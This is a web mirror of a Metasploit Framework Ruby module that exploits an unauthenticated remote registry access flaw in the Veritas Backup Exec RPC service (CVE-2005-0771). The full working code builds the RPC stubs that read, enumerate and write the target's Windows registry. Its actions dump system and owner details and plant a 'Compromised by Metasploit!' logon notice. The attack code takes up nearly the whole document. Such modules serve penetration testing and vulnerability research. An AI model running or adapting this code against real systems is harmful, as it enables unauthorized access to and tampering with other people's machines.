CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/backupexec/registry.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::DCERPC

8
  include Msf::Post::Windows::Registry

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'Veritas Backup Exec Server Registry Access',

13
      'Description'    => %q{

14
        This modules exploits a remote registry access flaw in the BackupExec Windows

15
      Server RPC service. This vulnerability was discovered by Pedram Amini and is based

16
      on the NDR stub information posted to openrce.org.

17
      Please see the action list for the different attack modes.

18


19
      },

20
      'Author'         => [ 'hdm' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'OSVDB', '17627' ],

25
          [ 'CVE', '2005-0771' ],

26
          [ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],

27
        ],

28
      'Actions'     =>

29
        [

30
          ['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'],

31
          ['Create Logon Notice', 'Description' => 'Add a logon notice']

32
        ],

33
      'DefaultAction' => 'System Information'

34
      ))

35


36
      register_options(

37
        [

38
          Opt::RPORT(6106),

39
          OptString.new('WARN',

40
            [

41
              false,

42
              "The warning to display for the Logon Notice action",

43
              "Compromised by Metasploit!\r\n"

44
            ]

45
          ),

46
        ])

47
  end

48


49
  def auxiliary_commands

50
    return {

51
      "regread" => "Read a registry value",

52
      # "regenum" => "Enumerate registry keys",

53
    }

54
  end

55


56
  def run

57
    case action.name

58
      when 'System Information'

59
        system_info()

60
      when 'Create Logon Notice'

61
        logon_notice()

62
    end

63
  end

64


65


66
  def cmd_regread(*args)

67


68
    if (args.length == 0)

69
      print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")

70
      return

71
    end

72


73
    paths  = args[0].split("\\")

74
    hive   = paths.shift

75
    subval = paths.pop

76
    subkey = paths.join("\\")

77
    data   = backupexec_regread(hive, subkey, subval)

78


79
    if (data)

80
      print_status("DATA: #{deunicode(data)}")

81
    else

82
      print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")

83
    end

84


85
  end

86


87
  def cmd_regenum(*args)

88


89
    if (args.length == 0)

90
      print_status("Usage: regenum HKLM\\\\Software")

91
      return

92
    end

93


94
    paths  = args[0].split("\\")

95
    hive   = paths.shift

96
    subkey = "\\" + paths.join("\\")

97
    data   = backupexec_regenum(hive, subkey)

98


99
    if (data)

100
      print_status("DATA: #{deunicode(data)}")

101
    else

102
      print_error("Failed to enumerate #{hive}\\#{subkey}...")

103
    end

104


105
  end

106


107
  def system_info

108
    print_status("Dumping system information...")

109


110
    prod_id   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'

111
    prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'

112
    prod_sp   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'

113
    owner     = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'

114
    company   = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'

115
    cpu       = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'

116
    username  = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'

117


118
    print_status("The current interactive user is #{deunicode(username)}")

119
    print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")

120
    print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")

121
    print_status("The system runs on a #{deunicode(cpu)}")

122
  end

123


124
  def logon_notice

125
    print_status("Setting the logon warning to #{datastore['WARN'].strip}...")

126
    backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText',  REG_SZ, datastore['WARN'])

127
    backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption',  REG_SZ, 'METASPLOIT')

128
  end

129


130


131
  def deunicode(str)

132
    str.gsub(/\x00/, '').strip

133
  end

134


135
  #

136
  # Write a registry key

137
  #

138
  def backupexec_regwrite(hive, subkey, subval, type, data)

139
    stub = backupexec_regrpc_write(

140
      :hive => registry_hive_lookup(hive),

141
      :subkey => subkey,

142
      :subval => subval,

143
      :type => type,

144
      :data => data

145
    )

146
    resp = backupexec_regrpc_call(5, stub)

147
    return false if resp.length == 0

148
    return true

149
  end

150


151
  #

152
  # Read a registry key

153
  #

154
  def backupexec_regread(hive, subkey, subval, type = REG_SZ)

155
    stub = backupexec_regrpc_read(

156
      :hive => registry_hive_lookup(hive),

157
      :subkey => subkey,

158
      :subval => subval,

159
      :type => type

160
    )

161
    resp = backupexec_regrpc_call(4, stub)

162


163
    return nil if resp.length == 0

164
    ret, len = resp[0,8].unpack('VV')

165
    return nil if ret == 0

166
    return nil if len == 0

167
    return resp[8, len]

168
  end

169


170
  #

171
  # Enumerate a registry key

172
  #

173
  def backupexec_regenum(hive, subkey)

174
    stub = backupexec_regrpc_enum(

175
      :hive => registry_hive_lookup(hive),

176
      :subkey => subkey

177
    )

178
    resp = backupexec_regrpc_call(7, stub)

179
    p resp

180


181
    return nil if resp.length == 0

182
    ret, len = resp[0,8].unpack('VV')

183
    return nil if ret == 0

184
    return nil if len == 0

185
    return resp[8, len]

186
  end

187


188
  #

189
  # Call the backupexec registry service

190
  #

191
  def backupexec_regrpc_call(opnum, data = '')

192


193
    handle = dcerpc_handle(

194
      '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',

195
      'ncacn_ip_tcp', [datastore['RPORT']]

196
    )

197


198
    dcerpc_bind(handle)

199


200
    resp = dcerpc.call(opnum, data)

201
    outp = ''

202


203
    if (dcerpc.last_response and dcerpc.last_response.stub_data)

204
      outp = dcerpc.last_response.stub_data

205
    end

206


207
    disconnect

208


209
    outp

210
  end

211


212
  # RPC Service 4

213
  def backupexec_regrpc_read(opts = {})

214
    subkey = opts[:subkey] || ''

215
    subval = opts[:subval] || ''

216
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE

217
    type   = opts[:type]   || REG_SZ

218


219
    stub =

220
      NDR.UnicodeConformantVaryingString(subkey) +

221
      NDR.UnicodeConformantVaryingString(subval) +

222
      NDR.long(type) +

223
      NDR.long(1024) +

224
      NDR.long(0) +

225
      NDR.long(4) +

226
      NDR.long(4) +

227
      NDR.long(hive)

228
    return stub

229
  end

230


231
  # RPC Service 7

232
  def backupexec_regrpc_enum(opts = {})

233
    subkey = opts[:subkey] || ''

234
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE

235
    stub =

236
      NDR.UnicodeConformantVaryingString(subkey) +

237
      NDR.long(4096) +

238
      NDR.long(0) +

239
      NDR.long(4) +

240
      NDR.long(4) +

241
      NDR.long(hive)

242
    return stub

243
  end

244


245
  # RPC Service 5

246
  def backupexec_regrpc_write(opts = {})

247
    subkey = opts[:subkey] || ''

248
    subval = opts[:subval] || ''

249
    hive   = opts[:hive]   || HKEY_LOCAL_MACHINE

250
    type   = opts[:type]   || REG_SZ

251
    data   = opts[:data]   || ''

252


253
    if (type == REG_SZ || type == REG_EXPAND_SZ)

254
      data = Rex::Text.to_unicode(data+"\x00")

255
    end

256


257
    stub =

258
      NDR.UnicodeConformantVaryingString(subkey) +

259
      NDR.UnicodeConformantVaryingString(subval) +

260
      NDR.long(type) +

261
      NDR.long(data.length) +

262
      NDR.long(data.length) +

263
      data +

264
      NDR.align(data) +

265
      NDR.long(4) +

266
      NDR.long(4) +

267
      NDR.long(hive)

268
    return stub

269
  end

270
end

271


272